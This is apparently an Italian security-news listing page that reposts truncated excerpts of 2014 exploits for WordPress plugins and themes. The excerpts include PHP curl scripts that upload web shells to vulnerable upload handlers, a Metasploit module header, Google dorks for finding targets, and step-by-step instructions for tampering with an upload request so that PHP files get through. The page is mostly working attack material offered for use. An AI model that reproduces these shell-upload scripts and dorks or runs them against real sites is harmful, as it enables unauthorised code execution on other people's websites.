WordPress wpDataTables 1.5.3 Shell Upload

26 novembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
#
# Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability
# 
# Vulnerability discovered by Claudio Viviani
#
# Date : 2014-11-22
#
# Exploit written by Claudio Viviani
#
# Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc
#
# --------------------------------------------------------------------
#
# Issue n.1 (wpdatatables.php)
#
# This function is always available without wpdatatables edit permission:
#
#    function wdt_upload_file(){
#        require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php');
#        $uploadHandler = new UploadHandler();
#        exit();
#    }
#    ...
#    ...
#    ...
#    add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file'...

Leggi il seguito »

WordPress InfusionSoft Upload

9 ottobre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
        Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
        upload and remote code execution.
      },
    ...

Leggi il seguito »

WordPress Slideshow Gallery 1.4.6 Shell Upload

16 settembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it
#
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
#
# Requirements:
#
# 1) Enabled user management...

Leggi il seguito »

WordPress WPtouch Mobile 3.4.5 Shell Upload

27 agosto 2014 - Fonte: http://www.mondounix.com
Wordpress WPtouch Mobile Plugin File Upload Vulnerability
 
=================================
 
 
====================
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/...

Leggi il seguito »

WordPress cnhk-slideshow Shell Upload

19 maggio 2014 - Fonte: http://www.mondounix.com
...

Leggi il seguito »

WordPress Echelon Theme Shell Upload

1 maggio 2014 - Fonte: http://www.mondounix.com
# Exploit Author:Th3 R0cksT3r
# Exploit Title: WordPress Echelon Theme Shell Upload
# Date: 25.04.2014
# Email: th3rockst3r@gmail.com 
# Vendor Homepage: http://wordpress.org/
# Google Dork: inurl:/wp-content/themes/echelon/
 
 
 
 
#Exploit :
==========
 
<?php
$uploadfile="file.php";
$ch = curl_init("
http://127.0.0.1/wp-content/themes/echelon/lib/admin/functions/media-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>
 
=========
 
Shell Access:...

Leggi il seguito »

WordPress Work-The-Flow 1.2.1 Shell Upload

30 aprile 2014 - Fonte: http://www.mondounix.com
# Author: nopesled
# Date: 24/04/14
# Software: https://wordpress.org/plugins/work-the-flow-file-upload/
# Company: http://wtf-fu.com/
# Version: 1.2.1
# Tested on: Windows 7
# Vulnerability: Unrestricted File Upload
 
 
Submit an image file via the wtf upload panel and intercept the POST request to /wp-admin/admin-ajax.php
 
By editing the data from the control 'accept_file_types', we can upload normally disallowed filetypes such as PHP.
 
Append '|php':
 
- ----------------------------123456789123456\r\n
Content-Disposition: form-data; name="accept_file_types"\r\n
\r\n
jpg|jpeg|mpg|mp3|png|gif|wav|ogg|php\r\n
 
 
Now change the extension in the data for 'filename' to '.php' and enter...

Leggi il seguito »

WordPress Business Intelligence 1.0.6 Shell Upload

31 marzo 2014 - Fonte: http://www.mondounix.com
##############################################################################################
# Exploit Title   : wordpress plugin "wp-business-intelligence" Remote code execution exploit
# Exploit Author  : Manish Kishan Tanwar
# vendor Home     : www.wpbusinessintelligence.com
# Version Affected: 1.0.6
# Discovered At   : IndiShell LAB (indishell.in aka indian cyber army)
# Love to         : zero cool,Team indishell,Hardeep Singh
##############################################################################################
 
 
////////////////////////////////////
POC Remote code Execution
////////////////////////////////////
this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php...

Leggi il seguito »

WordPress Vithy / Appius / Dagda / Vector / Shotzz Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Custom Background Shell Upload
# Google Dork     : inurl:"/wp-content/plugins/custom-background/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »

WordPress Felici / Custom Background Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Felici Shell Upload
# Google Dork     : inurl:"/wp-content/themes/felici/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
 
$uploadfile="cafc.php.jpg";
 
$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »